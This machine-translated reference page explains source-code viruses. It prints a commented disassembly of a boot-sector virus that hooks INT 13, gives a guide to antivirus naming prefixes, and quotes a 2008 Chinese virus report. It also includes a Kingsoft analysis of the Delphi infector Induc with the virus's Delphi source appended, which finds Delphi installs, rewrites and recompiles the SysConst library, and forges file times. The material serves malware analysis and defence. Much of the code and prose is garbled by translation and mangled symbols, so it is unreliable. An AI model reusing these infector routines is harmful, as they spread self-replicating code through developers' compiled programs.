What Is a Source Code Virus?

A source-type virus attacks a program written in a high-level language. The virus is inserted into the source program before the program written in the high-level language is compiled, and becomes a part of the legitimate program after successful compilation.

Source virus

A source-type virus attacks a program written in a high-level language. The virus is inserted into the source program before the program written in the high-level language is compiled, and becomes a part of the legitimate program after successful compilation.
Chinese name
Source virus
Belong to
Source-level virus attack written in a high-level language
Purpose
Become part of a legitimate program after successful compilation
Virus introduction
Specific name is forgotten
Virus introduction:
This is a typical boot virus, and the specific name has been forgotten. It looks a bit like a 6.4 virus from the technology used (Which master knows, please advise)
Virus analysis:
; ===================================================== =
; 0000: 7C0B is the disk logo, 80H is the hard disk
; ===================================================== =
0000: 7C00 EB1C JMP 7C1E
0000: 7C02 00 00 00 00 00 00-00 00 00 80 00 00 00 00 ..............
0000: 7C10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 ..............
0000: 7C1E FA CLI
0000: 7C1F 33C0 XOR AX, AX
0000: 7C21 8ED8 MOV DS, AX
0000: 7C23 BC007C MOV SS, AX
0000: 7C25 8BF4 MOV SI, SP
0000: 7C28 FB STI
0000: 7C2A C4064C00 LES AX, [004C]
0000: 7C2F A3077C MOV [7C07], AX
0000: 7C32 8C06097C MOV [7C09], ES
0000: 7C36 A11304 MOV AX, [0413]
0000: 7C39 48 DEC AX
0000: 7C3A 48 DEC AX
0000: 7C3B A31304 MOV [0413], AX
0000: 7C3E B106 MOV CL, 06
0000: 7C40 D3E0 SHL AX, CL
0000: 7C42 83C0 MOV ES, AX
0000: 7C44 B90002 MOV CX, 0200
0000: 7C47 33FF XOR DI, DI
0000: 7C49 FC CLD
0000: 7C4A F3 REPZ
0000: 7C4B A4 MOVSB
0000: 7C4C B88800 MOV AX, 0088
0000: 7C4F 06 PUSH ES
0000: 7C50 50 PUSH AX
0000: 7C51 CB RETF
; ===================================================
; The following is a virus INT 13 interrupt handling routine
; ===================================================
0000: 7C52 1E PUSH DS
0000: 7C53 50 PUSH AX
0000: 7C54 F6C2F0 TEST DL, F0
0000: 7C57 7528 JNZ 7C81
0000: 7C59 D0EC SHR AH, 1
0000: 7C5B FECC DEC AH
0000: 7C5D 7522 JNZ 7C81
0000: 7C5F 33C0 XOR AX, AX
0000: 7C61 8ED8 MOV DS, AX
0000: 7C63 A16C04 MOV AX, [046C]
0000: 7C66 8AC4 MOV AL, AH
0000: 7C68 2E CS:
0000: 7C69 2A060300 SUB AL, [0003]
0000: 7C6D 3C02 CMP AL, 02
0000: 7C6F 7210 JB 7C81
0000: 7C71 2E CS:
0000: 7C72 88260300 MOV [0003], AH
0000: 7C76 3D0200 CMP AX, 0002
0000: 7C79 7303 JNB 7C7E
0000: 7C7B E8CC00 CALL 7D4A
0000: 7C7E E8E800 CALL 7D69
0000: 7C81 58 POP AX
0000: 7C82 1F POP DS
0000: 7C83 2E CS:
0000: 7C84 FF2E0700 JMP FAR [0007]
; ===================================================
; The following is executed at the high end of memory
; ===================================================
0000: 7C88 33C0 XOR AX, AX
0000: 7C8A 8EC0 MOV ES, AX
0000: 7C8C CD13 INT 13
0000: 7C8E 0E PUSH CS
0000: 7C8F 1F POP DS
0000: 7C90 803E0B0000 CMP BYTE PTR [000B], 00
0000: 7C95 7424 JZ 7CBB
; ===================================================
; The following is the handling of the hard disk
; ===================================================
0000: 7C97 BEAE01 MOV SI, 7CAE
0000: 7C9A 83C610 ADD SI, +10
0000: 7C9D 803C80 CMP BYTE PTR [SI], 80
0000: 7CA0 75F8 JNZ 7C9A
0000: 7CA2 8B14 MOV DX, [SI]
0000: 7CA4 8B4C02 MOV CX, [SI + 02]
0000: 7CA7 BB007C MOV BX, 7C00
0000: 7CAA B80102 MOV AX, 0201
0000: 7CAD CD13 INT 13
0000: 7CAF 72D7 JB 7C88
0000: 7CB1 2E CS:
0000: 7CB2 C7064801C007 MOV WORD PTR [0148], 07C0
0000: 7CB8 EB7B JMP 02
; ===================================================
; The following is the handling of the floppy disk
; ===================================================
0000: 7CBA 90 NOP
0000: 7CBB B280 MOV DL, 80
0000: 7CBD E8A900 CALL 7D69
0000: 7CC0 BF1800 MOV DI, 0018
0000: 7CC3 8B45F9 MOV AX, [DI-07]
0000: 7CC6 B90400 MOV CX, 0004
0000: 7CC9 D3E8 SHR AX, CL
0000: 7CCB 8BE8 MOV BP, AX
0000: 7CCD 8B45FE MOV AX, [DI-02]
0000: 7CD0 D1E0 SHL AX, 1
0000: 7CD2 40 INC AX
0000: 7CD3 03E8 ADD BP, AX
0000: 7CD5 F635 D BYTE PTR [DI]
0000: 7CD7 8ACC MOV CL, AH
0000: 7CD9 FEC1 INC CL
0000: 7CDB 33D2 XOR DX, DX
0000: 7CDD 8AF0 MOV DH, AL
0000: 7CDF BB0005 MOV BX, 0500
0000: 7CE2 B80102 MOV AX, 0201
0000: 7CE5 CD13 INT 13
0000: 7CE7 72F9 JB 7CE2
0000: 7CE9 8BC5 MOV AX, BP
0000: 7CEB BE3400 MOV SI, 0034
0000: 7CEE B707 MOV BH, 07
0000: 7CF0 F635 D BYTE PTR [DI]
0000: 7CF2 33C9 XOR CX, CX
0000: 7CF4 86E1 XCHG AH, CL
0000: 7CF6 2BF1 SUB SI, CX
0000: 7CF8 F67502 D BYTE PTR [DI + 02]
0000: 7CFB 8BD0 MOV DX, AX
0000: 7CFD 86D5 XCHG DL, CH
0000: 7CFF 8A05 MOV AL, [DI]
0000: 7D01 2AC1 SUB AL, CL
0000: 7D03 FEC1 INC CL
0000: 7D05 B402 MOV AH, 02
0000: 7D07 50 PUSH AX
0000: 7D08 CD13 INT 13
0000: 7D0A 58 POP AX
0000: 7D0B 72F8 JB 7D05
0000: 7D0D B101 MOV CL, 01
0000: 7D0F 02F8 ADD BH, AL
0000: 7D11 02F8 ADD BH, AL
0000: 7D13 8B05 MOV AX, [DI]
0000: 7D15 FEC6 INC DH
0000: 7D17 EA7502 CMP DH, [DI + 02]
0000: 7D1A 7204 JB 7D20
0000: 7D1C B600 MOV DH, 00
0000: 7D1E FEC5 INC CH
0000: 7D20 2BF0 SUB SI, AX
0000: 7D22 73E1 JNB 7D05
0000: 7D24 03C6 ADD AX, SI
0000: 7D26 B402 MOV AH, 02
0000: 7D28 CD13 INT 13
0000: 7D2A 8A6DFD MOV CH, [DI-03]
0000: 7D2D 8BDD MOV BX, BP
; ===================================================
; Will change based on hard disk floppy handling
; ===================================================
0000: 7D2F C70648017000 MOV WORD PTR [0148], 0070
; ===================================================
; The following is a jump boot normal partition
; ===================================================
0000: 7D35 33C0 XOR AX, AX
0000: 7D37 A20B00 MOV [000B], AL
0000: 7D3A 8ED8 MOV DS, AX
0000: 7D3C B052 MOV AL, 52
0000: 7D3E A34C00 MOV [004C], AX
0000: 7D41 8C0E4E00 MOV [004E], CS
0000: 7D45 EA00007000 JMP 0070: 0000
; ===================================================
Computer Virus Defense Handbook! How to identify computer viruses by name Name, at this time some people are stunned, so a long list of names, how do I know what virus? In fact, as long as we master the naming rules of some viruses, we can judge some of the public characteristics of the virus by the virus names appearing in the reports of antivirus software. With so many viruses in the world, in order to facilitate the management of anti-virus companies, they will classify and name the viruses according to their characteristics. Although the naming rules of each anti-virus company are different, they are generally named using a unified naming method. The general format is: & amp; lt; virus prefix & amp; gt;. & Amp; lt; virus name & amp; gt;. & Amp; lt; virus suffix & amp; gt ;. Virus prefix refers to the type of virus, which is used to distinguish the racial classification of viruses. Different types of viruses have different prefixes. For example, our common Trojan virus prefix is Trojan, the worm prefix is Worm, etc. and others. The virus name refers to the family characteristics of a virus, and is used to distinguish and identify the virus family. For example, the family names of the famous CIH viruses used to be the same "CIH", and the recent oscillating wave worm virus that has been buzzing. The family name is "Sasser". Virus suffix refers to the characteristics of a virus variant, which is used to distinguish a specific variant of a particular family virus. Generally, the 26 letters in English are used to represent it. For example, Worm.Sasser.b refers to the variant B of the oscillating wave worm, so it is generally called "oscillating wave B variant" or "oscillating wave variant B". If there are many variants of the virus (also showing that the virus has tenacious vitality ^ _ ^), you can use a mixture of numbers and letters to represent the variant identification. In summary, a virus prefix is very helpful for us to quickly determine which type of virus the virus belongs to. By judging the type of virus, you can have a rough assessment of the virus (of course, this requires accumulation of knowledge about some common virus types, which is beyond the scope of this article). According to the virus name, we can further find out the detailed characteristics of the virus by looking for information. The virus suffix lets us know which variant of the virus is currently in your machine. The following are some explanations of common virus prefixes (for the Windows operating system we use the most): 1. System viruses The system virus prefixes are: Win32, PE, Win95, W32, W95, etc. The general public feature of these viruses is that they can infect * .exe and * .dll files of the Windows operating system and spread through these files. Such as CIH virus. 2. Worm The prefix of the worm is: Worm. The public characteristic of this virus is that it spreads through network or system vulnerabilities. Most worms have the characteristic of sending poisonous emails to the outside and blocking the network. Such as shock waves (blocking the network), small postmen (sending poisoned emails), etc. 3, Trojan virus, hacker virus Trojan virus prefix is: Trojan, hacker virus prefix name is generally Hack. The public characteristics of Trojans are to enter users 'systems through network or system vulnerabilities and hide them, and then leak the user's information to the outside world, while hacking viruses have a visual interface that can remotely control users' computers. Trojan horses and hacking viruses often appear in pairs, that is, Trojan horses are responsible for invading users' computers, and hacking viruses are controlled by this Trojan horse. Both types are now increasingly integrated. General Trojans such as the QQ message tail Trojan Trojan.QQ3344, and everyone may encounter more Trojans for online games such as Trojan.LMir.PSW.60. It is added here that virus names such as PSW or PWD generally indicate that the virus has the function of stealing passwords (these letters are generally the abbreviations of "password" in English) and some hacking programs such as: (Hack.Nether.Client) and so on. 4. Script virus The prefix of the script virus is: Script. The common characteristics of script viruses are viruses written in script languages and transmitted through web pages, such as Red Code (Script.Redlof)-not our boss code brother ^ _ ^. Script viruses also have the following prefixes: VBS, JS (indicating what kind of script was written), such as Happy Time (VBS.Happytime), 14th (Js.Fortnight.cs), and so on. 5. Macro virus In fact, macro virus is also a kind of script virus. Because of its special nature, it is counted as a separate category here. The prefix of the macro virus is Macro, and the second prefix is one of Word, Word97, Excel, Excel97 (and maybe others). Any virus that only infects WORD97 and previous versions of WORD documents uses Word97 as the second prefix, the format is: Macro.Word97; all viruses that only infect WORD documents after WORD97, use Word as the second prefix, the format is: Macro.Word ; Viruses that only infect EXCEL97 and previous versions of Excel files use Excel97 as the second prefix, the format is: Macro.Excel97; Viruses that only infect EXCEL files after EXCEL97 and later versions use Excel as the second prefix, the format is: Macro. Excel, and so on. The public characteristic of this type of virus is that it can infect OFFICE series documents, and then spread through OFFICE universal templates, such as the famous Macrosa (Melissa). 6. Backdoor virus The prefix of backdoor virus is: Backdoor. The public characteristic of this type of virus is that it spreads through the network, opens the back door to the system, and brings security risks to the user's computer. For example, 54 friends have encountered the IRC backdoor Backdoor.IRCBot. 7. Virus planting program The common characteristic of viruses is that one or several new viruses will be released from the body to the system directory during operation, and the new viruses released will cause damage. Such as: Glacier Seeder (Dropper.BingHe2.2C), MSN Shooter (Dropper.Worm.Smibag), etc. 8. Destructive program virus The prefix of the destructive program virus is: Harm. The public characteristic of this type of virus is that it has attractive icons to entice users to click. When a user clicks on such a virus, the virus will directly damage the user's computer. For example: format C drive (Harm.formatC.f), killer command (Harm.Command.Killer), etc. 9. The joke virus's prefix is: Joke. Also called a hoax virus. The public characteristic of this type of virus is that it has attractive icons to entice users to click. When the user clicks on this type of virus, the virus will perform various damage operations to scare the user. In fact, the virus has not done any damage to the user's computer. Such as: female ghost (Joke. Girlghost) virus. 10 Bundle machine virus The prefix of the bundle machine virus is: Binder. The public characteristic of this type of virus is that virus authors use specific bundled programs to bundle the virus with some applications such as QQ and IE. On the surface, it is a normal file. When users run these bundled viruses, they will run these on the surface. Applications, and then hide the running bundled viruses, harming users. For example: Bundled QQ (Binder.QQPass.QQBin), System Killer (Binder.killsys), etc. The above are more common virus prefixes. Sometimes we will see some others, but they are relatively rare. Here is a brief mention: DoS: DoS attack will be performed on a host or server; Exploit: will automatically overflow the other party or itself System vulnerability to spread itself, or it is itself an overflow tool for Hacking; HackTool: A hacking tool may not itself damage your machine, but it will be used by others to use you as a substitute to damage others. After detecting a certain virus, you can use the above-mentioned methods to make a preliminary judgment on the basic situation of the virus, and achieve the effect of knowing yourself. This information will be of great help to you when antivirus cannot be checked automatically.
Jinshan Cloud Security Center recently took the lead in intercepting a virus "Delphi Nightmare" (Win32.Induc.b.820224) targeting computer programmers, especially users of Delphi, which briefly describes the virus behavior: it specifically infects Delphi programs Once the computer is successful, any program written by the programmer in the future will carry the virus!
The following is the analysis of Virus.Win32.Induc.a infection type by Kingsoft Internet Security Analysis Group:
File information
File size: 163840 bytes
Packing type: ASPack 2.12
Writing language: Borland Delphi6.0
Virus type: Infectious
Virus description
This sample is a Delphi-infected virus. By infecting the SysConst.dcu file in the Delphi library file, the files generated by the user are infected after programming with the infected library file.
Third, virus behavior
The prion operates when it processes the initialization table for the Nth time (Call StartExe), that is, it executes the virus code before the program loads the normal Delphi file. (The number N varies depending on the Delphi version of the infected user).
Loop detection registry key HKLMsoftwareBorlandDelphiX.0 to determine whether Delphi is installed on the current machine. Test version (4.0 5.0 6.0 7.0). If the machine is not installed, the virus code is directly jumped out for normal initialization without infection.
For example, if Delphi is installed, the user's Delphi installation path is obtained by accessing the registry.
Back up SysConst.pas in the source folder and SysConst.dcu in the library folder according to the user installation path;
That is, %% SourceRtlSysSysConst.pas and %% LibSysConst.dcu.
Write Delphi source code to source file SysConst.pas
Call %% Bindcc32.exe to generate a local library file from the infected source file SysConst.pas and replace it with Lib.
Restore the normal SysConst.pas backup and delete the infected files in the source code.
Change the time of the replaced SysConst.dcu file in the library file to make it consistent with other files.
Fourth, the degree of virus harm
The virus is actually not harmful, except that it changes all the programs generated by the library with abnormal code, and the code behavior is as described above.
Because it modifies the Delphi library files so that the files compiled with the Delphi language are infected, the sizes of the infected files are different, and the packing conditions are also different. This analysis sample is only randomly selected from the sample size and type Not representative.
V. Solutions
This virus has a secondary infection ability, which means that all the Delphi programs you compiled can infect the Delphi library files on your machine again. To completely remove the virus, you need to do the following:
1. Don't run any programs written in Delphi.
2. Use Anti-Virus to scan all executable files written in Delphi and remove viruses. (Or delete all the executable files written by Delphi, including those downloaded from the Internet)
3. Delete the file% DelphiInstallPath% LibSysConst.dcu, and then perform step 4 or steps 5 and 6.
4. Rename the file% DelphiInstallPath% LibSysConst.bak to SysConst.dcu and end.
5. Call DCC32.exe to compile the new SysConst.dcu. The compile command is as follows:% DelphiInstallPath% binDCC32.exe "% DelphiInstallPath% SourceRtlSysSysConst.pas"
6. Copy the newly compiled SysConst.dcu (in the% DelphiInstallPath% SourceRtlSys directory) file to the% DelphiInstallPath% Lib directory and end.
Appendix (Delphi source code)
uses windows;
var sc: array [1..24] of string = (
function x (s: string): string;
var i: integer;
begin
for i: = 1 to length (s) do
if s [i] = # 36 then
s [i]: = # 39;
result: = s;
end;
procedure re (s, d, e: string);
var f1, f2: textfile;
h: cardinal;
f: STARTUPINFO;
p: PROCESS_INFORMATION;
b: boolean;
t1, t2, t3: FILETIME;
begin
CreateFile (pchar (d + $ bak $), 0,0,0,3,0,0);
if h <> DWORD (-1) then begin
CloseHandle (h);
exit;
end;
assignfile (f1, s);
reset (f1);
if ioresult <> 0 then
exit;
assignfile (f2, d + $ pas $);
rewrite (f2);
if ioresult <> 0 then begin
closefile (f1);
exit;
end;
while not eof (f1) do begin
readln (f1, s);
writeln (f2, s);
if pos ($ implementation $, s) <> 0 then
break;
end;
for h: = 1 to 1 do
writeln (f2, sc [h]);
for h: = 1 to 23 do
writeln (f2, $$$$ + sc [h], $$$, $);
writeln (f2, $$$$ + sc [24] + $$$); $);
for h: = 2 to 24 do
writeln (f2, x (sc [h]));
closefile (f1);
closefile (f2);
MoveFile (pchar (d + $ dcu $), pchar (d + $ bak $));
fillchar (f, sizeof (f), 0);
f.cb: = sizeof (f);
f.dwFlags: = STARTF_USESHOWWINDOW;
f.wShowWindow: = SW_HIDE;
b: = CreateProcess (nil, pchar (e + $ "$ + d + $ pas" $), 0,0, false, 0,0,0, f, p);
if b then
WaitForSingleObject (p.hProcess, INFINITE);
MoveFile (pchar (d + $ bak $), pchar (d + $ dcu $));
DeleteFile (pchar (d + $ pas $));
h: = CreateFile (pchar (d + $ bak $), 0,0,0,3,0,0);
if h = DWORD (-1) then
exit;
GetFileTime (h, @ t1, @ t2, @ t3);
CloseHandle (h);
h: = CreateFile (pchar (d + $ dcu $), 256,0,0,3,0,0);
if h = DWORD (-1) then
exit;
SetFileTime (h, @ t1, @ t2, @ t3);
CloseHandle (h);
end;
procedure st;
var k: HKEY;
c: array [1..255] of char;
i: cardinal;
r: string;
v: char;
begin
for v: = $ to $ do
if RegOpenKeyEx (HKEY_LOCAL_MACHINE, pchar ($ SoftwareBorlandDelphi $ + v + $ .0 $), 0, KEY_READ, k) = 0 then begin
i: = 255;
if RegQueryValueEx (k, $ RootDir $, nil, @ i, @ c, @ i) = 0 then begin
r: = $$;
i: = 1;
while c [i] <> # 0 do begin
r: = r + c [i];
inc (i);
end;
re (r + $ sourcertlsysSysConst $ + $ .pas $, r + $ libsysconst. $, $ "$ + r + $ bindcc32.exe" $);
end;
RegCloseKey (k);
end;
end;
begin
st;
end.
The data in the "2008 China Computer Virus Epidemic and Internet Security Report" was jointly monitored by Kingsoft Internet Security Monitoring Center, Kingsoft Internet Security Center, Kingsoft Global Virus Emergency Response Center, and Kingsoft Internet Security Customer Service Center. All conclusions and opinions held in this report are exclusively released by Kingsoft, and have nothing to do with other cooperating companies and departments. At the same time, both you and Kingsoft acknowledge that the generation and spread of viruses, Trojans, malicious programs, etc. are uncontrollable and unpredictable. Therefore, Kingsoft only guarantees that it can be issued within the scope of its controllable data and technical level and within its control of viruses In this report, Jinshan does not make any guarantees for any viruses, Trojans, malicious programs, etc. that it has not yet controlled, but Jinshan will be committed to continuously improve its technical level and control its scope. You are clearly aware of the situation and are committed to not claiming rights from Kingsoft for any results that may arise from trust or use of this report.
In 2008, the number of new computer viruses and Trojan horses in China has exploded, and the total number has exceeded 10 million. The modularization, specialization of virus manufacturing, and the Internetization of virus "operational" models have become three prominent features of the development of computer viruses in China in 2008. At the same time, the "profit-seeking" nature of virus makers has not changed, and webpage hacking and vulnerability attacks have become the main channels for hackers to profit.
1. Analysis of the overall situation of computer viruses and Trojans in China in 2008
In 2008, the number of new computer viruses and Trojans increased geometrically. According to the monitoring data of Kingsoft Internet Security Center, in 2008, Kingsoft Internet Security intercepted 13,997,717 new viruses and Trojans, a 48-fold increase compared with 2007.
Among the newly added viruses and Trojans, the number of new Trojans was 78,019,11, which accounted for 56.13% of the total number of new viruses and Trojans in the year; the hacking category accounted for 21.97% of the total number of new viruses and Trojans in the year; The proportion jumped from 0.8% in 2007 to 5.96%, becoming the fastest growing virus. Statistics from Kingsoft Security Center show that 90% of virus attachments infect web users. In 2008, according to the statistics of Kingsoft Internet Security Center, a total of 69,738,785 computers were infected with viruses across the country, an increase of 40% compared with 2007.

IN OTHER LANGUAGES

Was this article helpful? Thanks for the feedback Thanks for the feedback

How can we help? How can we help?

RELATED ARTICLES